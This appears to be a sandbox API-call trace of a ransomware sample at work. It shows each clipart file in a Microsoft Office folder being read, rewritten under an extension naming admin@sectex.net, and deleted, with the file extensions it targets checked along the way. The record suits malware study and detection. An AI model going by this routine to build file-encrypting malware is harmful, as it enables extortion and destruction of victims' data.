	[0148.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0148.419] GetLastError () returned 0x0
	[0148.419] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x47c, lpOverlapped=0x0) returned 1
	[0148.436] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x480, lpOverlapped=0x0) returned 1
	[0148.437] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.437] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.437] SetEndOfFile (hFile=0x3ac) returned 1
	[0148.438] CloseHandle (hObject=0x3ac) returned 1
	[0148.438] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.438] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.440] CloseHandle (hObject=0x3d4) returned 1
	[0148.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf")) returned 1
	[0148.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString=".doc") returned 4
	[0148.444] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString=".docx") returned 5
	[0148.444] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.444] lstrlenW (lpString=".pdf") returned 4
	[0148.444] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString=".xls") returned 4
	[0148.444] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.444] lstrlenW (lpString=".xlsx") returned 5
	[0148.444] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.444] lstrlenW (lpString=".ppt") returned 4
	[0148.444] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString=".zip") returned 4
	[0148.444] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.444] lstrlenW (lpString=".rar") returned 4
	[0148.444] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString=".bz2") returned 4
	[0148.444] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString=".7z") returned 3
	[0148.444] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString=".dbf") returned 4
	[0148.444] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString=".1cd") returned 4
	[0148.444] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.444] lstrlenW (lpString=".jpg") returned 4
	[0148.444] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString=".doc") returned 4
	[0148.445] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString=".docx") returned 5
	[0148.445] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.445] lstrlenW (lpString=".pdf") returned 4
	[0148.445] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString=".xls") returned 4
	[0148.445] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.445] lstrlenW (lpString=".xlsx") returned 5
	[0148.445] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.445] lstrlenW (lpString=".ppt") returned 4
	[0148.445] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString=".zip") returned 4
	[0148.445] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.445] lstrlenW (lpString=".rar") returned 4
	[0148.445] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString=".bz2") returned 4
	[0148.445] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString=".7z") returned 3
	[0148.445] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString=".dbf") returned 4
	[0148.445] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString=".1cd") returned 4
	[0148.445] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63
	[0148.445] lstrlenW (lpString=".jpg") returned 4
	[0148.446] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.446] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.446] lstrlenW (lpString="HH01058_.WMF") returned 12
	[0148.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.446] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2756) returned 1
	[0148.446] CloseHandle (hObject=0x3d4) returned 1
	[0148.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf")) returned 0x20
	[0148.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.447] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.447] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0148.447] GetLastError () returned 0x0
	[0148.448] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xac4, lpOverlapped=0x0) returned 1
	[0148.456] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xad0, lpOverlapped=0x0) returned 1
	[0148.457] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.457] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.457] SetEndOfFile (hFile=0x3ac) returned 1
	[0148.457] CloseHandle (hObject=0x3ac) returned 1
	[0148.458] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.458] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.459] CloseHandle (hObject=0x3d4) returned 1
	[0148.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf")) returned 1
	[0148.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.460] lstrlenW (lpString=".doc") returned 4
	[0148.460] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.460] lstrlenW (lpString=".docx") returned 5
	[0148.460] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.461] lstrlenW (lpString=".pdf") returned 4
	[0148.461] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString=".xls") returned 4
	[0148.461] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.461] lstrlenW (lpString=".xlsx") returned 5
	[0148.461] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.461] lstrlenW (lpString=".ppt") returned 4
	[0148.461] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString=".zip") returned 4
	[0148.461] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.461] lstrlenW (lpString=".rar") returned 4
	[0148.461] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString=".bz2") returned 4
	[0148.461] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString=".7z") returned 3
	[0148.461] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString=".dbf") returned 4
	[0148.461] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString=".1cd") returned 4
	[0148.461] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString=".jpg") returned 4
	[0148.461] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.461] lstrlenW (lpString=".doc") returned 4
	[0148.461] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString=".docx") returned 5
	[0148.462] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.462] lstrlenW (lpString=".pdf") returned 4
	[0148.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString=".xls") returned 4
	[0148.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.462] lstrlenW (lpString=".xlsx") returned 5
	[0148.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.462] lstrlenW (lpString=".ppt") returned 4
	[0148.462] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.462] lstrlenW (lpString=".zip") returned 4
	[0148.462] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.462] lstrlenW (lpString=".rar") returned 4
	[0148.462] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString=".bz2") returned 4
	[0148.462] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString=".7z") returned 3
	[0148.462] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.462] lstrlenW (lpString=".dbf") returned 4
	[0148.462] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.462] lstrlenW (lpString=".1cd") returned 4
	[0148.462] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 63
	[0148.462] lstrlenW (lpString=".jpg") returned 4
	[0148.462] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.463] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.463] lstrlenW (lpString="HH01065_.WMF") returned 12
	[0148.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.463] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1268) returned 1
	[0148.463] CloseHandle (hObject=0x3d4) returned 1
	[0148.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf")) returned 0x20
	[0148.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.464] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.464] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0148.464] GetLastError () returned 0x0
	[0148.464] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4f4, lpOverlapped=0x0) returned 1
	[0148.673] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x500, lpOverlapped=0x0) returned 1
	[0148.675] ReadFile (in: hFile=0x3d4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.675] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.676] SetEndOfFile (hFile=0x3ac) returned 1
	[0148.676] CloseHandle (hObject=0x3ac) returned 1
	[0148.676] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.676] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.678] CloseHandle (hObject=0x3d4) returned 1
	[0148.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf")) returned 1
	[0148.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.682] lstrlenW (lpString=".doc") returned 4
	[0148.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString=".docx") returned 5
	[0148.682] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.682] lstrlenW (lpString=".pdf") returned 4
	[0148.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString=".xls") returned 4
	[0148.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.682] lstrlenW (lpString=".xlsx") returned 5
	[0148.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.682] lstrlenW (lpString=".ppt") returned 4
	[0148.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.682] lstrlenW (lpString=".zip") returned 4
	[0148.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.682] lstrlenW (lpString=".rar") returned 4
	[0148.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString=".bz2") returned 4
	[0148.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString=".7z") returned 3
	[0148.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.682] lstrlenW (lpString=".dbf") returned 4
	[0148.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.682] lstrlenW (lpString=".1cd") returned 4
	[0148.683] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.683] lstrlenW (lpString=".jpg") returned 4
	[0148.683] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.683] lstrlenW (lpString=".doc") returned 4
	[0148.683] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString=".docx") returned 5
	[0148.683] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.683] lstrlenW (lpString=".pdf") returned 4
	[0148.683] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString=".xls") returned 4
	[0148.683] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.683] lstrlenW (lpString=".xlsx") returned 5
	[0148.683] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.683] lstrlenW (lpString=".ppt") returned 4
	[0148.683] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.683] lstrlenW (lpString=".zip") returned 4
	[0148.683] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.683] lstrlenW (lpString=".rar") returned 4
	[0148.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString=".bz2") returned 4
	[0148.683] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString=".7z") returned 3
	[0148.683] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.683] lstrlenW (lpString=".dbf") returned 4
	[0148.683] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.684] lstrlenW (lpString=".1cd") returned 4
	[0148.684] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 63
	[0148.684] lstrlenW (lpString=".jpg") returned 4
	[0148.684] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.684] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.684] lstrlenW (lpString="HH01875_.WMF") returned 12
	[0148.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.688] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2616) returned 1
	[0148.688] CloseHandle (hObject=0x3e8) returned 1
	[0148.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf")) returned 0x20
	[0148.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.688] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.688] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
